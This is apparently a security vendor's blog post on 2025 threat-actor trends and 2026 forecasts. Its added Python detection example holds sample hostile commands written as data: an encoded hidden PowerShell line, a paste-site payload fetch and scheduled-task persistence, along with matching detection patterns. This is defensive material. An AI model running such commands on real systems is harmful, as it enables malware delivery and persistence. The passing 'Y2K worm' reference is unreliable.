The modus operandi of cybercriminals has come a long way since the early 90s. Hackers in the 90s hacked out of curiosity or for fun (Millennials, remember the Y2K worm?), but three decades later, cybercrime is a notoriously thriving ecosystem.
Attacks have become industrialized. AI, ransomware-as-a-service, and complex multi-stage tactics are hitting larger organizations and critical infrastructure.
The threat actor trends in 2025 (discussed later in the article) highlight how AI-driven threat actors and highly coordinated cybercriminal groups became more advanced.
In short, the way cybercrime groups and threat actors plan, execute and scale their operations has improved markedly. They also leverage technology more effectively and cooperate to execute attacks in a timely, coordinated manner.
As a result, the top cyber threat actors of 2025 executed more operations than in any year prior to 2025.
Many hackers have shifted their approach to finding and using the best possible opportunities to commit cybercrime for profit while attempting to reduce the risk of being caught by law enforcement.
While threat actors in the past carried out attacks as opportunities arose, many cybercriminal organizations have now developed methods that give them long-term, systematic access to their target’s complete network environment.
Who is a Threat Actor?
Any entity that purposefully engages in malicious activity targeting computer systems, networks, or data is considered a “threat actor.” The term is deliberately broad: it is defined not by the actor’s skill level or motivation but by the action (behavior) taken, the objective behind it, and the intent.
The spectrum of threat actor activity ranges from individual operators running small-scale fraud or malware campaigns, to organized crime syndicates, to state-aligned entities that possess infrastructure (supporting resources), tools, and operational discipline.
Commonalities between threat actors include the exploitation of cyber techniques, including uploading malware, phishing for access, using ransomware, stealing credentials, and exploiting software or hardware security vulnerabilities to compromise (attack) the target.
A threat actor is identified not by a single attack but by a pattern of consistent risk posed by ongoing, intentional activity. New and emerging threat actor tactics of 2026 will further define how these actors leverage AI, automation, and long-term strategic access.
Threat Actors vs. Hackers: A Functional Distinction
When we refer to a “threat actor” and a “hacker,” we tend to use these terms interchangeably, but they are actually different. A “hacker” is someone who possesses technical skills and knowledge that allow them to manipulate computer systems or software in various ways.
There are many different kinds of hackers. Some are ethical hackers, penetration testers or security researchers who use their abilities for a good cause, to protect systems, or for other legitimate reasons; such ethical hackers do not fall into the category of threat actors because their intentions are non-malicious.
In contrast, a “threat actor” is defined by malicious intent toward the target. Technical prowess is secondary: a threat actor’s skill level matters only relative to the target, and what they want to do is harmful, such as compromise, exploit, or disrupt that target.
The threat actor behavior of 2025 shows that all threat actors act in a threatening manner, by conducting hacking activities or abusing digital systems, whereas hackers may act ethically.
To summarize:
- Not all hackers engage in threatening behaviors.
- All threat actors behave in a threatening manner by conducting hacking activities or abusing digital systems.
This distinction matters for defensive strategy: a strategy should focus on intent and the nature of the behavior displayed, not just the technical indicators of the attack.
Core Categories of Threat Actors
Cybercrime is primarily driven by financial motives and typically involves ransomware, fraud, data theft, or extortion. Cybercriminals often scale their operations for maximum profit and adopt a more or less opportunistic approach; however, some cybercriminals have begun to develop a more strategic approach to conducting the cybercrime business.
Nation-state hackers act on behalf of the government or state and conduct a variety of espionage, surveillance, influence operations, and cyber-warfare activities. Nation-state actors primarily target government networks, critical infrastructure, defense, and strategic industry within their state or government.
Hacktivist hackers are ideologically and/or politically motivated hackers. The goal of hacktivist hackers is to disrupt the services used by their target, disclose sensitive information to the public, and embarrass the target they are attacking.
Insider threats are individuals, such as employees or contractors, who already have access to an organization’s networks, computers, or systems. They may abuse that access intentionally or through negligence.
Insider threats often do not have to bypass perimeter defense systems because they have legitimate access to the networks.
The low-skill hacker uses tools that have previously been created or existing exploits that have been leaked, or ransomware-as-a-service platforms. While low-skill hackers have significantly less technical expertise than other types of cybercriminals, they still pose a direct risk because of their ability to use tools, volume of attacks, and automated processes.
Why the “Threat Actor” Lens Matters
Focusing on threat actors rather than isolated incidents changes how risk is assessed. Individual attacks are symptoms; threat actors represent ongoing capability and intent.
Understanding who is behind an attack, how they typically operate, and what they target allows security experts to anticipate future activity instead of reacting to past damage.
The cyber threat trends of 2025 show that threat actors reuse infrastructure, share tooling, and adapt tactics across campaigns. Defense efforts that ignore the actor behind the activity miss the broader pattern, and that gap is where most damage occurs.
1. Ransomware Shifted from Opportunistic Crime to Strategic Disruption
Ransomware threat actors of 2025 were no longer driven purely by fast financial returns. According to Cyble’s Global Threat Landscape Report: H1 2025, cybercrime groups such as Akira demonstrated deliberate sector-based targeting, focusing on industries where operational disruption creates cascading economic and reputational consequences. Manufacturing, professional services, and critical business services also became consistent targets, particularly across Europe.
Akira’s renewed focus on the DACH region reflected a calculated geographic pivot rather than random expansion. This region functions as an industrial and logistical hub, where downtime carries immediate financial and regulatory impact.
This approach suggests that ransomware groups are prioritizing leverage and systemic pressure over attack volume, a trend expected to intensify in 2026.
2. Ransomware-as-a-Service Became Fully Industrialized
Ransomware-as-a-Service (RaaS) models continued to mature in 2025, transforming ransomware into a scalable criminal ecosystem. Qilin exemplified this trend by enabling affiliates to conduct highly customizable attacks across healthcare, manufacturing, construction, and public services.
In April 2025 alone, Qilin claimed 72 victims. Its infrastructure supported global operations spanning the U.S., Europe, India, Singapore, and beyond. In the APAC region, Qilin led ransomware activity with 32 reported attacks during H1 2025.
The success of RaaS platforms indicates a future where attack frequency is driven less by core operators and more by decentralized affiliates, making attribution, disruption, and defense more complex.
3. Extortion-Only Attacks Replaced Traditional Encryption in Many Campaigns
One of the most notable shifts in 2025 was the growing abandonment of encryption altogether. New ransomware groups such as Dire Wolf, Silent Team, DATACARRY, Gunra, and the actor known as “J” relied on data theft and leak-based extortion without deploying ransomware lockers.
This model reduces execution time, lowers detection risk, and exploits reputational damage as the primary pressure mechanism. Victims often discover breaches only when their data appears on leak sites.
In 2026, this trend is likely to expand as organizations improve backup resilience but remain vulnerable to public exposure.
4. Attackers Prioritized Data Theft Before Any Disruptive Action
Exfiltration-first strategies became standard practice across ransomware and malware campaigns. Rather than encrypting systems immediately, attackers focused on stealing sensitive data early in the intrusion lifecycle.
This approach ensures leverage even if encryption fails, or recovery mechanisms exist. It also enables secondary monetization through underground markets. As regulatory penalties and reputational damage increasingly outweigh operational downtime, data theft will remain central to threat actor strategy in 2026.
5. Living-Off-the-Land Techniques Became the Default, Not the Exception
Threat actors in 2025 relied heavily on legitimate system tools to evade detection. PowerShell, Windows Management Instrumentation (WMI), Remote Desktop Protocol (RDP), and native Windows binaries were frequently abused to execute commands, move laterally, and maintain persistence.
Because these tools blend into normal administrative activity, they sharply reduce the effectiveness of signature-based detection, as the threat actor behavior of 2025 shows.
This reliance on Living-Off-the-Land techniques suggests that attackers will continue favoring stealth and persistence over speed in 2026.
6. Multi-Stage, Memory-Resident Malware Chains Increased in Complexity
Malware campaigns observed in 2025 featured multi-layer loaders designed to operate almost entirely in memory. A campaign analyzed during the year demonstrated how obfuscated PowerShell scripts enabled multiple security protocols, retrieved payloads from Pastebin, and executed them using in-memory techniques.
These loaders performed layered Base64 decoding, decryption with hardcoded keys, and delayed execution before deploying final-stage malware. Internet connectivity checks using legitimate domains preceded payload delivery, further reducing detection risk. Such complexity signals that memory-based attacks will dominate advanced malware campaigns moving forward.
7. DLL Sideloading and Legitimate Library Abuse Expanded
Threat actors made extensive use of DLL sideloading in 2025 to hide malicious code within trusted executables. In one observed campaign, for example, a legitimate executable loaded a malicious DLL, which then decrypted embedded payloads and injected them into trusted Windows libraries such as dbghelp.dll and pla.dll.
By modifying memory permissions and overwriting legitimate library contents, attackers can conceal malicious execution within trusted processes. This technique complicates forensic analysis and increases dwell time, an approach likely to expand further in 2026.
8. Information-Stealing Malware Became a Core Payload, Not an Add-On
Malware such as Lumma Stealer and Amadey Bot played a central role in 2025 campaigns. These payloads were not secondary tools but primary objectives, designed to harvest credentials, browser data, and system information before ransomware or extortion actions occurred.
Lumma Stealer was commonly injected into newly spawned processes such as msiexec.exe, while Amadey Bot established persistence via scheduled tasks disguised as legitimate services.
The emphasis on credential harvesting suggests attackers are building access pipelines for future attacks rather than one-time payouts.
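The process-creation patterns described in sections 5, 6 and 8 (hidden or encoded PowerShell, a Pastebin fetch, Lumma Stealer injected into msiexec.exe, Amadey persisting through a scheduled task) can be turned into simple detection logic over endpoint telemetry. The following Python is an added example, not Cyble’s code or tooling; the events, URL, file paths and encoded blob are constructed placeholders, and the ATT&CK ids in the rule names are the standard technique numbers for those behaviours.

```python
import re

# Constructed Sysmon-style events (not real telemetry); URL, paths and blob are placeholders.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc <BASE64_PLACEHOLDER>"},
    {"id": 2, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -c "iwr https://pastebin.com/raw/PLACEHOLDER"'},
    {"id": 3, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Temp\vendor-setup.msi /qn"},
    {"id": 4, "image": r"C:\Windows\System32\msiexec.exe", "cmdline": "msiexec.exe"},
    {"id": 5, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc minute /mo 1 /tn "Windows Update Service" /tr C:\Users\Public\AppData\Roaming\svc.exe'},
    {"id": 6, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc daily /tn Backup /tr "C:\Program Files\Backup\backup.exe"'},
]

PASTE_HOST = re.compile(r"pastebin\.com|paste\.ee|hastebin", re.I)
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.I)
MSI_PACKAGE = re.compile(r"\.msi\b|/i\b|/x\b|/package", re.I)
def _image_is(event, name):
    return event["image"].lower().endswith("\\" + name)

def rule_hidden_or_encoded_powershell(event):
    # First stage of the in-memory loader chains: hidden window or encoded command.
    return _image_is(event, "powershell.exe") and any(
        flag in event["cmdline"].lower() for flag in ("-enc", "-w hidden"))

def rule_paste_site_download(event):
    # PowerShell fetching a next stage from a paste site, as in the Pastebin chain.
    return _image_is(event, "powershell.exe") and bool(PASTE_HOST.search(event["cmdline"]))

def rule_bare_msiexec(event):
    # msiexec.exe with no package to install has nothing legitimate to do: a classic hollowed host.
    return _image_is(event, "msiexec.exe") and not MSI_PACKAGE.search(event["cmdline"])

def rule_task_from_user_writable_path(event):
    # Scheduled task whose action lives in a user-writable folder (Amadey-style persistence).
    cl = event["cmdline"].lower()
    return _image_is(event, "schtasks.exe") and "/create" in cl and bool(USER_WRITABLE.search(cl))

RULES = [("hidden/encoded PowerShell (T1059.001)", rule_hidden_or_encoded_powershell),
         ("PowerShell download from paste site", rule_paste_site_download),
         ("bare msiexec.exe injection host (T1218.007)", rule_bare_msiexec),
         ("scheduled task from user-writable path (T1053.005)", rule_task_from_user_writable_path)]

def triage(events):
    # Map event id -> names of the rules that fired; events with no hits are dropped.
    hits = {e["id"]: [name for name, check in RULES if check(e)] for e in events}
    return {event_id: names for event_id, names in hits.items() if names}
```

Events 3 and 6 are the benign counterparts (a real MSI install, a task under Program Files) and produce no hits, which is the point: the rules key on what the legitimate use of the tool would never look like.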
9. Industry Targeting Remained Highly Predictable and Unchanged
The threat actor victimology in 2025 followed consistent patterns. Financial services remained attractive due to direct access to funds and sensitive data. Healthcare organizations were targeted because operational disruption carries life-and-death implications.
Government entities faced espionage, disruption, and political pressure, while education institutions remained vulnerable due to large user bases and weaker security budgets.
Energy, utilities, retail, and e-commerce continued to face elevated risk due to their criticality, payment data, and customer scale. These targeting patterns are unlikely to change in 2026, but attack sophistication against these sectors will continue to rise.
10. Threat Actors Operated as Ecosystems, Not Isolated Groups
Perhaps the most important trend from 2025 was the transformation of cybercrime into an interconnected ecosystem. Shared tools, affiliate programs, underground marketplaces, and overlapping infrastructure blurred the lines between distinct threat groups.
Lower barriers to entry, combined with modular tooling and shared intelligence, allowed new actors to gain the spotlight quickly while established groups refined strategy rather than tactics. In 2026, defenders will face not just individual attackers, but fluid networks of collaboration and competition.
What These Trends Signal for 2026
Threat actor activity in 2026 will continue the 2025 trend toward precision-driven, high-impact operations that began with increased attacks on the financial sector.
The 2026 threat actor landscape will be characterized by a greater emphasis on how targets are chosen than on how many are chosen: attackers will focus on precision and high-impact targets rather than volume.
- Ransomware incidents may drop in frequency but increase in severity.
- RaaS platforms will operate modularly, improving efficiency and resilience.
- AI-driven threat actors will standardize multi-stage, in-memory attacks.
- Targeting will remain deliberate across manufacturing, healthcare, energy, logistics, and public services.
Cybercriminals will optimize proven tactics and collaborate on TTPs, leaving reactive defenders at a disadvantage. With AI-driven intelligence and real-time insights, organizations need proactive solutions to fight against cybercrime groups.
Cyble provides award-winning threat intelligence and AI-native cybersecurity platforms that predict, detect, and neutralize threats before they impact your organization.
Trusted by hundreds of global enterprises and recognized by Gartner and Forrester, Cyble delivers actionable insights across ransomware, nation-state attacks, and cyber threat actor tactics.
Experience AI-powered security in action with Cyble today!
